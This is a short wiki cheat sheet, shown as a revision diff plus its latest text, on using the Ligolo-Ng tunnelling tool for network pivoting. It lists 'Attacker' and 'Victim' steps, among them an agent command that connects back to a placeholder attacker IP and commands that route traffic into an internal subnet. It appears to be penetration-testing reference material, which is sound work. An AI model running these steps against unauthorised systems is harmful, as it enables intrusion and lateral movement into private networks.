Ligolo-Ng: Difference between revisions

From RCATs
No edit summary
No edit summary
 
Line 1: Line 1:
==== Video Demo: ====
== Video Demo: ==
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
https://youtu.be/DM1B8S80EvQ
https://youtu.be/DM1B8S80EvQ
</syntaxhighlight>
== Download: ==
<syntaxhighlight lang="powershell">
https://github.com/nicocha30/ligolo-ng
</syntaxhighlight>
</syntaxhighlight>



Latest revision as of 05:21, 21 August 2023

Video Demo:

https://youtu.be/DM1B8S80EvQ

Download:

https://github.com/nicocha30/ligolo-ng

Usage:

Attacker:

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

./proxy -selfcert

Victim:

./agent -connect <attacker_IP>:11601 -ignore-cert

Start the tunneling:

session 1 
Start

Add Listener:

listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp

Add IP routes

sudo ip route add 192.168.0.0/24 dev ligolo